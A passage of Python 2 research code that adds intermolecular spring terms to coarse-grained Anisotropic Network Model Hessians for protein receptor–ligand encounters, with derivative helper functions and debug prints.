referenceStructure: structure to take calphas from, the hessian HR belongs to it or to its superset if I is a chain
neighborStructure: structure to apply the neighborhood calculations on
encounter: object with all encounter information
areStructuresChains: boolean to describe if the structures are chains (subsets)
equilibriumAt: is the equilibrium set to r_ij or r_ij_b
workOnReceptor: whether the Hessian and the referenceStructure belong to the receptor (True) or the ligand (False)
selstr: atom type of the coarse-grained ANM (by default calpha)
"""
assert equilibriumAt == "r_ij" or equilibriumAt == "r_ij_b"
if workOnReceptor:
refchain = encounter.getRefChain()
mobile = encounter.getMobile()
mobChain = encounter.getMobChain()
boundCounterpart = encounter.getBoundCounterpart()
boundCounterpartChain = encounter.getBoundCounterpartChain()
unboundCounterpartChain = encounter.getUnboundCounterpartChain()
else:
refchain = encounter.getUnboundCounterpartChain()
mobile = encounter.getBoundCounterpart()
mobChain = encounter.getBoundCounterpartChain()
boundCounterpart = encounter.getMobile()
boundCounterpartChain = encounter.getMobChain()
unboundCounterpartChain = encounter.getRefChain()
neighborStructureCalpha = neighborStructure.select('calpha')
for idx, element in enumerate(referenceStructure.select('calpha')):
contactsOfI = encounter.getIntermolecularNeighborsOfAtom(element, neighborStructure, selstr, str(self.utils.config.customHRdistance))
# if element has contacts in the neighborStructure, the hessian needs an update in the 3*3 matrix on the diagonal of this element atom
if contactsOfI:
# print "contact at i, refChainCalphas[i]: ", i, refChainCalphas[i]
contacts_counterpartChainIndices = self.utils.getMatchingStructureSelections(neighborStructureCalpha, contactsOfI, neighborStructureCalpha)
assert len(contactsOfI) == len(contacts_counterpartChainIndices)
# access each element contact to create the deltaTerm
overallTerm = np.zeros((3,3))
for elementcontact, contacts_counterpartChainIndex in zip(contactsOfI, contacts_counterpartChainIndices):
#self.utils.assertTwoAtomsAreEqual(refChainCalphas[i], mobChainCalphas[i], useCoords=False, useResname=True)
#self.utils.assertTwoAtomsAreEqual(elementcontact, boundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=True)
if equilibriumAt == "r_ij_b":
r_ij_b = calcDistance(element, elementcontact)
elementPositionInChain = encounter.accessANMs().getCalphaPosition(element, mobChain.select('calpha'))
contactPositionInChain = encounter.accessANMs().getCalphaPosition(elementcontact, boundCounterpartChain.select('calpha'))
r_ij = calcDistance(refchain.select('calpha')[elementPositionInChain], unboundCounterpartChain.select('calpha')[contactPositionInChain])
self.utils.assertTwoAtomsAreEqual(mobChain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(refchain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(unboundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
else:
elementPositionInChain = encounter.accessANMs().getCalphaPosition(element, mobChain.select('calpha'))
contactPositionInChain = encounter.accessANMs().getCalphaPosition(elementcontact, boundCounterpartChain.select('calpha'))
r_ij = calcDistance(refchain.select('calpha')[elementPositionInChain], unboundCounterpartChain.select('calpha')[contactPositionInChain])
r_ij_b = r_ij
self.utils.assertTwoAtomsAreEqual(mobChain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(refchain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(unboundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
#r_ij_b = calcDistance(zip(mobile.select('calpha'))[idx][0], zip(boundCounterpart.select('calpha'))[contacts_counterpartChainIndex][0])
# make the 3*3 hessian term for this contact (excluding gamma, gamma is multiplied at the end to the sum)
deltaTerm = self.make3By3HessianTerm(refchain.select('calpha')[elementPositionInChain], unboundCounterpartChain.select('calpha')[contactPositionInChain], r_ij, r_ij_b)
print refchain.select('calpha')[elementPositionInChain], unboundCounterpartChain.select('calpha')[contactPositionInChain], " r_ij, rij_b: ", r_ij, r_ij_b
overallTerm += deltaTerm
#print "r_ij, r_ij_b: ", r_ij, r_ij_b
# multiply the overallTerm with the spring constant gamma
overallTerm = overallTerm * self.utils.config.customForceConstant
# print overallTerm
#print contactsOfI.numAtoms(), "neighbors, modifying at hessian (loopcounter*3)+1: ", str((loopCounter*3)+1)
#print str(i)+"'th refchain calpha, hessian line number ", (loopCounter*3)+1, "contacts with ", unboundCounterpartChainCalphas[contacts_counterpartChainIndex], " unboundcounterpartchainindex: ", contacts_counterpartChainIndices
#print ""
# add the overallterm to the hessian matrix
elementPosition = encounter.accessANMs().getCalphaPosition(refchain.select('calpha')[elementPositionInChain], encounter.getReference().select('calpha'))
HR = self.add3By3MatrixtoHessian(overallTerm, HR, elementPosition*3)
print "adding to hessian at: ", (elementPosition*3+1)
print "added custom terms to hessian"
return HR
def calcCustomH_A(self, HR, encounter, workOnReceptor=True, selstr='calpha'):
""" Modifies the hessian of anm_reference according to calcCustomH_A and returns it. """
if workOnReceptor:
refChainCalphas = encounter.getRefChain().select('calpha')
mobChainCalphas = encounter.getMobChain().select('calpha')
mobChain = encounter.getMobChain()
refChain = encounter.getRefChain()
boundCounterpartChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
boundCounterpartChain = encounter.getBoundCounterpartChain()
unboundCounterpartChain = encounter.getUnboundCounterpartChain()
unboundCounterpartChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
referenceCalphas = encounter.getReference().select('calpha')
else:
refChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
mobChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
mobChain = encounter.getBoundCounterpartChain()
refChain = encounter.getUnboundCounterpartChain()
boundCounterpartChainCalphas = encounter.getMobChain().select('calpha')
boundCounterpartChain = encounter.getMobChain()
unboundCounterpartChain = encounter.getRefChain()
unboundCounterpartChainCalphas = encounter.getRefChain().select('calpha')
referenceCalphas = encounter.getUnboundCounterpart().select('calpha')
#encounter.printIntermolecularNeighbors(encounter.getReference(), encounter.getUnboundCounterpart(), selstr, str(self.utils.config.customHRdistance))
# Loop over all calphas in the reference structure (using matched chains)
counterUnmatchedCalphas = 0
loopCounter = 0
for element in referenceCalphas:
i = loopCounter - counterUnmatchedCalphas
if self.utils.doesAtomExistInY(element, refChainCalphas) is None:
counterUnmatchedCalphas += 1
loopCounter += 1
continue
else:
contactsOfI = encounter.getIntermolecularNeighbors(refChain, unboundCounterpartChain, i, selstr, str(self.utils.config.customHRdistance))
# if there are contacts in the unbound counterpart, the hessian needs an update in the 3*3 matrix of the diagonal of this atom
if contactsOfI:
# print "contact at i, refChainCalphas[i]: ", i, refChainCalphas[i]
contacts_counterpartChainIndices = self.utils.getMatchingStructure(unboundCounterpartChainCalphas, contactsOfI, boundCounterpartChainCalphas)
assert len(contactsOfI) == len(contacts_counterpartChainIndices)
# access each element contact to create the deltaTerm
overallTerm = np.zeros((3,3))
for elementcontact, contacts_counterpartChainIndex in zip(contactsOfI, contacts_counterpartChainIndices):
self.utils.assertTwoAtomsAreEqual(refChainCalphas[i], mobChainCalphas[i], useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(elementcontact, boundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=True)
r_ij = calcDistance(refChainCalphas[i], elementcontact)
r_ij_b = calcDistance(mobChainCalphas[i], boundCounterpartChainCalphas[contacts_counterpartChainIndex])
# make the 3*3 hessian term for this contact (excluding gamma, gamma is multiplied at the end to the sum)
deltaTerm = self.make3By3HessianTerm(refChainCalphas[i], elementcontact, r_ij, r_ij_b)
overallTerm += deltaTerm
#print "r_ij, r_ij_b: ", r_ij, r_ij_b
# multiply the overallTerm with the spring constant gamma
overallTerm = overallTerm * self.utils.config.customForceConstant
# print overallTerm
#print contactsOfI.numAtoms(), "neighbors, modifying at hessian (loopcounter*3)+1: ", str((loopCounter*3)+1)
print str(i)+"'th refchain calpha, hessian line number ", (loopCounter*3)+1, "contacts with ", unboundCounterpartChainCalphas[contacts_counterpartChainIndex], " unboundcounterpartchainindex: ", contacts_counterpartChainIndices
print ""
# add the overallterm to the hessian matrix
HR = self.add3By3MatrixtoHessian(overallTerm, HR, loopCounter*3)
loopCounter += 1
assert(loopCounter-counterUnmatchedCalphas) == refChainCalphas.numAtoms()
print "added custom terms to hessian"
return HR
def calcCustomH_A_IJ(self, encounter, workOnReceptor=True, selstr='calpha'):
""" Modifies the hessian of anm_reference according to calcCustomH_A and returns it. """
if workOnReceptor:
refChainCalphas = encounter.getRefChain().select('calpha')
mobChainCalphas = encounter.getMobChain().select('calpha')
mobChain = encounter.getMobChain()
refChain = encounter.getRefChain()
boundCounterpartChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
boundCounterpartChain = encounter.getBoundCounterpartChain()
unboundCounterpartChain = encounter.getUnboundCounterpartChain()
unboundCounterpartChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
referenceCalphas = encounter.getReference().select('calpha')
mobileCalphas = encounter.getMobile().select('calpha')
unboundCounterpart = encounter.getUnboundCounterpart()
unboundCounterpartCalphas = encounter.getUnboundCounterpart().select('calpha')
else:
refChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
mobChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
mobChain = encounter.getBoundCounterpartChain()
refChain = encounter.getUnboundCounterpartChain()
boundCounterpartChainCalphas = encounter.getMobChain().select('calpha')
boundCounterpartChain = encounter.getMobChain()
unboundCounterpartChain = encounter.getRefChain()
unboundCounterpartChainCalphas = encounter.getRefChain().select('calpha')
referenceCalphas = encounter.getUnboundCounterpart().select('calpha')
mobileCalphas = encounter.getBoundCounterpart().select('calpha')
unboundCounterpart = encounter.getReference()
unboundCounterpartCalphas = encounter.getReference().select('calpha')
offDiagonalHessianMatrix = np.zeros(((referenceCalphas.numAtoms()*3), (unboundCounterpartCalphas.numAtoms()*3) ))
#encounter.printIntermolecularNeighbors(encounter.getReference(), encounter.getUnboundCounterpart(), selstr, str(self.utils.config.customHRdistance))
# Loop over all calphas in the reference structure (using matched chains)
counterUnmatchedCalphas = 0
loopCounter = 0
for element in referenceCalphas:
i = loopCounter - counterUnmatchedCalphas
if self.utils.doesAtomExistInY(element, refChainCalphas) is None:
counterUnmatchedCalphas += 1
loopCounter += 1
continue
else:
contactsOfI = encounter.getIntermolecularNeighbors(refChain, unboundCounterpartChain, i, selstr, str(self.utils.config.customHRdistance))
# if there are contacts in the unbound counterpart, the hessian needs an update in the 3*3 matrix of the diagonal of this atom
if contactsOfI:
# print "contact at i, refChainCalphas[i]: ", i, refChainCalphas[i]
contacts_counterpartChainIndices = self.utils.getMatchingStructure(unboundCounterpartChainCalphas, contactsOfI, boundCounterpartChainCalphas)
assert len(contactsOfI) == len(contacts_counterpartChainIndices)
# access each element contact to create the deltaTerm
for elementcontact, contacts_counterpartChainIndex in zip(contactsOfI, contacts_counterpartChainIndices):
overallTerm = np.zeros((3,3))
self.utils.assertTwoAtomsAreEqual(refChainCalphas[i], mobChainCalphas[i], useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(elementcontact, boundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=True)
r_ij = calcDistance(refChainCalphas[i], elementcontact)
r_ij_b = calcDistance(mobChainCalphas[i], boundCounterpartChainCalphas[contacts_counterpartChainIndex])
# make the 3*3 hessian term for this contact (excluding gamma, gamma is multiplied at the end to the sum)
deltaTerm = self.make3By3OffDiagonalHessianTermIJ(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], r_ij, r_ij)  # note: r_ij is passed for both distance arguments here; r_ij_b computed above is not used
overallTerm += deltaTerm
#print "r_ij, r_ij_b: ", r_ij, r_ij_b
# multiply the overallTerm with the spring constant gamma
overallTerm = overallTerm * self.utils.config.customForceConstant
counterPartCalphaPosition = encounter.accessANMs().getCalphaPosition(unboundCounterpartChainCalphas[contacts_counterpartChainIndex], unboundCounterpart)
print "off diagonal i,j "+str(loopCounter*3)+" "+str(counterPartCalphaPosition*3)+ " term: ", overallTerm
offDiagonalHessianMatrix = self.add3By3MatrixtoOffDiagonalHessianMatrixIJ(overallTerm, offDiagonalHessianMatrix, loopCounter*3, counterPartCalphaPosition*3)
#print contactsOfI.numAtoms(), "neighbors, modifying at hessian (loopcounter*3)+1: ", str((loopCounter*3)+1)
print str(i)+"'th refchain calpha, hessian line number ", (loopCounter*3)+1, "contacts with ", unboundCounterpartChainCalphas[contacts_counterpartChainIndex], " unboundcounterpartchainindex: ", contacts_counterpartChainIndices
print ""
loopCounter += 1
assert(loopCounter-counterUnmatchedCalphas) == refChainCalphas.numAtoms()
print "added custom terms to hessian"
return offDiagonalHessianMatrix
def calcCustomH_A_NeighborsBound(self, HR, encounter, selstr='calpha'):
""" Modifies the hessian of anm_reference according to calcCustomH_A and returns it. """
refChainCalphas = encounter.getRefChain().select('calpha')
mobChainCalphas = encounter.getMobChain().select('calpha')
boundCounterpartChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
unboundCounterpartChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
referenceCalphas = encounter.getReference().select('calpha')
mobileCalphas = encounter.getMobile().select('calpha')
#encounter.printIntermolecularNeighbors(encounter.getMobile(), encounter.getBoundCounterpart(), selstr, str(self.utils.config.customHRdistance))
# Loop over all calphas in the reference structure (using matched chains)
counterUnmatchedCalphas = 0
loopCounter = 0
for element in referenceCalphas:
i = loopCounter - counterUnmatchedCalphas
if self.utils.doesAtomExistInY(element, refChainCalphas) is None:
counterUnmatchedCalphas += 1
loopCounter += 1
continue
else:
contactsOfI = encounter.getIntermolecularNeighbors(encounter.getMobChain(), encounter.getBoundCounterpartChain(), i, selstr, str(self.utils.config.customHRdistance))
# if there are contacts in the unbound counterpart, the hessian needs an update in the 3*3 matrix of the diagonal of this atom
if contactsOfI:
# print "contact at i, refChainCalphas[i]: ", i, refChainCalphas[i]
contacts_counterpartChainIndices = self.utils.getMatchingStructure(boundCounterpartChainCalphas, contactsOfI, unboundCounterpartChainCalphas)
assert len(contactsOfI) == len(contacts_counterpartChainIndices)
# access each element contact to create the deltaTerm
overallTerm = np.zeros((3,3))
for elementcontact, contacts_counterpartChainIndex in zip(contactsOfI, contacts_counterpartChainIndices):
self.utils.assertTwoAtomsAreEqual(refChainCalphas[i], mobChainCalphas[i], useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(elementcontact, unboundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChainCalphas[contacts_counterpartChainIndex], elementcontact, useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChainCalphas[contacts_counterpartChainIndex], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=False)
r_ij = calcDistance(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex])
r_ij_b = calcDistance(mobChainCalphas[i], elementcontact)
# make the 3*3 hessian term for this contact (excluding gamma, gamma is multiplied at the end to the sum)
# if customHR_B, just use the distance d_0, else use the true distance in the bound pairs for the second derivatives
if self.utils.config.customHR_B:
if r_ij >= self.utils.config.customHRdistance:
deltaTerm = self.make3By3HessianTerm(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], r_ij, self.utils.config.customHRdistance)
overallTerm += deltaTerm
else:
deltaTerm = self.make3By3HessianTerm(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], r_ij, r_ij_b)
overallTerm += deltaTerm
#print "r_ij, r_ij_b: ", r_ij, r_ij_b
# multiply the overallTerm with the spring constant gamma
overallTerm = overallTerm * self.utils.config.customForceConstant
#print overallTerm
print contactsOfI.numAtoms(), "neighbors, modifying at hessian (loopcounter*3)+1: ", str((loopCounter*3)+1)
#print contactsOfI.getSelstr()
print str(i)+"'th refchain calpha, hessian line number ", (loopCounter*3)+1, "contacts with ", unboundCounterpartChainCalphas[contacts_counterpartChainIndex], " unboundcounterpartchainindex: ", contacts_counterpartChainIndices
print ""
# add the overallterm to the hessian matrix
HR = self.add3By3MatrixtoHessian(overallTerm, HR, loopCounter*3)
loopCounter += 1
assert(loopCounter-counterUnmatchedCalphas) == refChainCalphas.numAtoms()
print "added custom terms to hessian"
return HR
def calcCustomH_A_NeighborsBoundGeneral(self, HR, encounter, workOnReceptor=True, selstr='calpha'):
""" Modifies the hessian of anm_reference according to calcCustomH_A and returns it. """
if workOnReceptor:
refChainCalphas = encounter.getRefChain().select('calpha')
mobChainCalphas = encounter.getMobChain().select('calpha')
mobChain = encounter.getMobChain()
boundCounterpartChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
boundCounterpartChain = encounter.getBoundCounterpartChain()
unboundCounterpartChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
referenceCalphas = encounter.getReference().select('calpha')
else:
refChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
mobChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
mobChain = encounter.getBoundCounterpartChain()
boundCounterpartChainCalphas = encounter.getMobChain().select('calpha')
boundCounterpartChain = encounter.getMobChain()
unboundCounterpartChainCalphas = encounter.getRefChain().select('calpha')
referenceCalphas = encounter.getUnboundCounterpart().select('calpha')
#encounter.printIntermolecularNeighbors(encounter.getMobile(), encounter.getBoundCounterpart(), selstr, str(self.utils.config.customHRdistance))
# Loop over all calphas in the reference structure (using matched chains)
counterUnmatchedCalphas = 0
loopCounter = 0
for element in referenceCalphas:
i = loopCounter - counterUnmatchedCalphas
if self.utils.doesAtomExistInY(element, refChainCalphas) is None:
counterUnmatchedCalphas += 1
loopCounter += 1
continue
else:
contactsOfI = encounter.getIntermolecularNeighbors(mobChain, boundCounterpartChain, i, selstr, str(self.utils.config.customHRdistance))
# if there are contacts in the unbound counterpart, the hessian needs an update in the 3*3 matrix of the diagonal of this atom
if contactsOfI:
# print "contact at i, refChainCalphas[i]: ", i, refChainCalphas[i]
contacts_counterpartChainIndices = self.utils.getMatchingStructure(boundCounterpartChainCalphas, contactsOfI, unboundCounterpartChainCalphas)
assert len(contactsOfI) == len(contacts_counterpartChainIndices)
# access each element contact to create the deltaTerm
overallTerm = np.zeros((3,3))
for elementcontact, contacts_counterpartChainIndex in zip(contactsOfI, contacts_counterpartChainIndices):
self.utils.assertTwoAtomsAreEqual(refChainCalphas[i], mobChainCalphas[i], useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(elementcontact, unboundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChainCalphas[contacts_counterpartChainIndex], elementcontact, useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChainCalphas[contacts_counterpartChainIndex], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=False)
r_ij = calcDistance(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex])
r_ij_b = calcDistance(mobChainCalphas[i], elementcontact)
# make the 3*3 hessian term for this contact (excluding gamma, gamma is multiplied at the end to the sum)
# if customHR_B, just use the distance d_0, else use the true distance in the bound pairs for the second derivatives
if self.utils.config.customHR_B:
if r_ij >= self.utils.config.customHRdistance:
deltaTerm = self.make3By3HessianTerm(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], r_ij, self.utils.config.customHRdistance)
overallTerm += deltaTerm
else:
deltaTerm = self.make3By3HessianTerm(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], r_ij, r_ij_b)
overallTerm += deltaTerm
#print "r_ij, r_ij_b: ", r_ij, r_ij_b
# multiply the overallTerm with the spring constant gamma
overallTerm = overallTerm * self.utils.config.customForceConstant
#print overallTerm
print contactsOfI.numAtoms(), "neighbors, modifying at hessian (loopcounter*3)+1: ", str((loopCounter*3)+1)
#print contactsOfI.getSelstr()
print str(i)+"'th refchain calpha, hessian line number ", (loopCounter*3)+1, "contacts with ", unboundCounterpartChainCalphas[contacts_counterpartChainIndex], " unboundcounterpartchainindex: ", contacts_counterpartChainIndices
print ""
# add the overallterm to the hessian matrix
HR = self.add3By3MatrixtoHessian(overallTerm, HR, loopCounter*3)
loopCounter += 1
assert(loopCounter-counterUnmatchedCalphas) == refChainCalphas.numAtoms()
print "added custom terms to hessian"
return HR
def calcOffDiagonalHessianBlockMatrixGeneral_IJ(self, encounter, workOnReceptor=True, selstr='calpha'):
""" Creates the off diagonal hessian block matrix and returns it. """
if workOnReceptor:
refChainCalphas = encounter.getRefChain().select('calpha')
mobChainCalphas = encounter.getMobChain().select('calpha')
mobChain = encounter.getMobChain()
boundCounterpartChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
boundCounterpartChain = encounter.getBoundCounterpartChain()
unboundCounterpartChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
referenceCalphas = encounter.getReference().select('calpha')
mobileCalphas = encounter.getMobile().select('calpha')
unboundCounterpart = encounter.getUnboundCounterpart()
unboundCounterpartCalphas = encounter.getUnboundCounterpart().select('calpha')
else:
refChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
mobChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
mobChain = encounter.getBoundCounterpartChain()
boundCounterpartChainCalphas = encounter.getMobChain().select('calpha')
boundCounterpartChain = encounter.getMobChain()
unboundCounterpartChainCalphas = encounter.getRefChain().select('calpha')
referenceCalphas = encounter.getUnboundCounterpart().select('calpha')
mobileCalphas = encounter.getBoundCounterpart().select('calpha')
unboundCounterpart = encounter.getReference()
unboundCounterpartCalphas = encounter.getReference().select('calpha')
offDiagonalHessianMatrix = np.zeros(((referenceCalphas.numAtoms()*3), (unboundCounterpartCalphas.numAtoms()*3) ))
# Loop over all calphas in the reference structure (using matched chains)
counterUnmatchedCalphas = 0
loopCounter = 0
for element in referenceCalphas:
i = loopCounter - counterUnmatchedCalphas
if self.utils.doesAtomExistInY(element, refChainCalphas) is None:
counterUnmatchedCalphas += 1
loopCounter += 1
continue
else:
contactsOfI = encounter.getIntermolecularNeighbors(mobChain, boundCounterpartChain, i, selstr, str(self.utils.config.customHRdistance))
# if there are contacts in the bound counterpart, the off diagonal part of the hessian needs an update in the 3*3 matrix of this atom and its neighbor
if contactsOfI:
# print "contact at i, refChainCalphas[i]: ", i, refChainCalphas[i]
contacts_counterpartChainIndices = self.utils.getMatchingStructure(boundCounterpartChainCalphas, contactsOfI, unboundCounterpartChainCalphas)
assert len(contactsOfI) == len(contacts_counterpartChainIndices)
# access each element contact to create the deltaTerm
for elementcontact, contacts_counterpartChainIndex in zip(contactsOfI, contacts_counterpartChainIndices):
overallTerm = np.zeros((3,3))
self.utils.assertTwoAtomsAreEqual(refChainCalphas[i], mobChainCalphas[i], useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(elementcontact, unboundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChainCalphas[contacts_counterpartChainIndex], elementcontact, useCoords=False, useResname=False)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChainCalphas[contacts_counterpartChainIndex], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=False)
r_ij = calcDistance(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex])
r_ij_b = calcDistance(mobChainCalphas[i], elementcontact)
# make the 3*3 hessian term for this contact
# if customHR_B, just use the distance d_0, else use the true distance in the bound pairs for the second derivatives
if self.utils.config.customHR_B:
if r_ij >= self.utils.config.customHRdistance:
deltaTerm = self.make3By3OffDiagonalHessianTermIJ(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], r_ij, self.utils.config.customHRdistance)
overallTerm += deltaTerm
else:
deltaTerm = self.make3By3OffDiagonalHessianTermIJ(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], r_ij, r_ij_b)
overallTerm += deltaTerm
# multiply the overallTerm with the spring constant gamma
overallTerm = overallTerm * self.utils.config.customForceConstant
# add the overall Term to the correct off diagonal super element in the hessian
counterPartCalphaPosition = encounter.accessANMs().getCalphaPosition(unboundCounterpartChainCalphas[contacts_counterpartChainIndex], unboundCounterpart)
offDiagonalHessianMatrix = self.add3By3MatrixtoOffDiagonalHessianMatrixIJ(overallTerm, offDiagonalHessianMatrix, loopCounter*3, counterPartCalphaPosition*3)
#print "r_ij, r_ij_b: ", r_ij, r_ij_b
#print overallTerm
print contactsOfI.numAtoms(), "neighbors, modifying at hessian (loopcounter*3)+1: ", str((loopCounter*3)+1)
#print contactsOfI.getSelstr()
#print str(i)+"'th refchain calpha, hessian line number ", (loopCounter*3)+1, "contacts with ", unboundCounterpartChainCalphas[contacts_counterpartChainIndex], " unboundcounterpartchainindex: ", contacts_counterpartChainIndices
print ""
loopCounter += 1
assert(loopCounter-counterUnmatchedCalphas) == refChainCalphas.numAtoms()
print "added custom terms to hessian"
return offDiagonalHessianMatrix
# original second-derivative terms (alternative formulations kept as comments below)
def secondDerivativeTermOnDiagonal(self, x_i, x_j, r_ij, r_ij_b):
""" @V / @x_i@x_i (excluding gamma)"""
result = 1 + (r_ij_b * np.power(x_j - x_i, 2) ) / np.power(r_ij, 3) - r_ij_b/r_ij
return result
def secondDerivateTermOffDiagonal(self, x_i, x_j, y_i, y_j, r_ij, r_ij_b):
""" @V / @x_i@y_j (excluding gamma) """
result = r_ij_b * (x_j - x_i) * ((y_j - y_i)/np.power(r_ij, 3))
return result
def secondDerivateTermOffDiagonalAtomsIJ(self, x_i, x_j, y_i, y_j, r_ij, r_ij_b):
""" Equation 21 before reducing, Atilgan paper, @V / @x_i@y_j (excluding gamma) """
result = -1.0 * r_ij_b * (x_j - x_i) * ((y_j - y_i)/np.power(r_ij, 3))
return result
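# Consistency note (added for clarity, not part of the original file): the three terms
# above are the second derivatives of the harmonic pair potential
#   V_ij = (gamma / 2) * (r_ij - r_ij_b)**2
# evaluated at the unbound separation r_ij, with gamma factored out:
#   d2V / dx_i dx_i =  1 - r_ij_b/r_ij + r_ij_b*(x_j - x_i)**2 / r_ij**3
#   d2V / dx_i dy_i =  r_ij_b*(x_j - x_i)*(y_j - y_i) / r_ij**3
#   d2V / dx_i dy_j = -r_ij_b*(x_j - x_i)*(y_j - y_i) / r_ij**3   (off-diagonal i,j super element)
# Setting r_ij_b equal to r_ij recovers the standard ANM terms used in the
# commented variants below.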
#
# using r_ij_b
# def secondDerivativeTermOnDiagonal(self, x_i, x_j, r_ij, r_ij_b):
# """ @V / @x_i@x_i (excluding gamma) from paper, assume r_ij is at equilibrium r_ij_b. """
# result = np.power(x_j - x_i, 2) / np.power(r_ij_b, 2)
# return result
#
# def secondDerivateTermOffDiagonal(self, x_i, x_j, y_i, y_j, r_ij, r_ij_b):
# """ @V / @x_i@y_j (excluding gamma) from paper, assume r_ij is at equilibrium r_ij_b. """
# result = ((x_j - x_i)*(y_j - y_i))/ np.power(r_ij_b, 2)
# return result
# using r_ij
# def secondDerivativeTermOnDiagonal(self, x_i, x_j, r_ij, r_ij_b):
# """ @V / @x_i@x_i (excluding gamma) from paper, assume r_ij is at equilibrium r_ij_b. """
# result = np.power(x_j - x_i, 2) / np.power(r_ij, 2)
# return result
#
# def secondDerivateTermOffDiagonal(self, x_i, x_j, y_i, y_j, r_ij, r_ij_b):
# """ @V / @x_i@y_j (excluding gamma) from paper, assume r_ij is at equilibrium r_ij_b. """
# result = ((x_j - x_i)*(y_j - y_i))/ np.power(r_ij, 2)
# return result
def make3By3HessianTerm(self, refChainCalpha, elementcontact, r_ij, r_ij_b):
""" Create a 3 by 3 matrix with the added terms for the hessian diagnonal (excluding multiplication with gamma)"""
x_i = refChainCalpha.getCoords()[0]
y_i = refChainCalpha.getCoords()[1]
z_i = refChainCalpha.getCoords()[2]
x_j = elementcontact.getCoords()[0]
y_j = elementcontact.getCoords()[1]
z_j = elementcontact.getCoords()[2]
deltaTerm = np.zeros((3,3))
deltaTerm[0][0] = self.secondDerivativeTermOnDiagonal(x_i, x_j, r_ij, r_ij_b)
deltaTerm[0][1] = self.secondDerivateTermOffDiagonal(x_i, x_j, y_i, y_j, r_ij, r_ij_b)
deltaTerm[0][2] = self.secondDerivateTermOffDiagonal(x_i, x_j, z_i, z_j, r_ij, r_ij_b)
deltaTerm[1][0] = deltaTerm[0][1]
deltaTerm[1][1] = self.secondDerivativeTermOnDiagonal(y_i, y_j, r_ij, r_ij_b)
deltaTerm[1][2] = self.secondDerivateTermOffDiagonal(y_i, y_j, z_i, z_j, r_ij, r_ij_b)
deltaTerm[2][0] = deltaTerm[0][2]
deltaTerm[2][1] = deltaTerm[1][2]
deltaTerm[2][2] = self.secondDerivativeTermOnDiagonal(z_i, z_j, r_ij, r_ij_b)
return deltaTerm
def add3By3MatrixtoHessian(self, delta3by3, HR, topleftIndex):
""" Add the delta3by3 matrix to its corresponding position of HR, located by
the topleftIndex. """
HR[topleftIndex][topleftIndex] += delta3by3[0][0]
HR[topleftIndex][topleftIndex+1] += delta3by3[0][1]
HR[topleftIndex][topleftIndex+2] += delta3by3[0][2]
HR[topleftIndex+1][topleftIndex] += delta3by3[1][0]
HR[topleftIndex+1][topleftIndex+1] += delta3by3[1][1]
HR[topleftIndex+1][topleftIndex+2] += delta3by3[1][2]
HR[topleftIndex+2][topleftIndex] += delta3by3[2][0]
HR[topleftIndex+2][topleftIndex+1] += delta3by3[2][1]
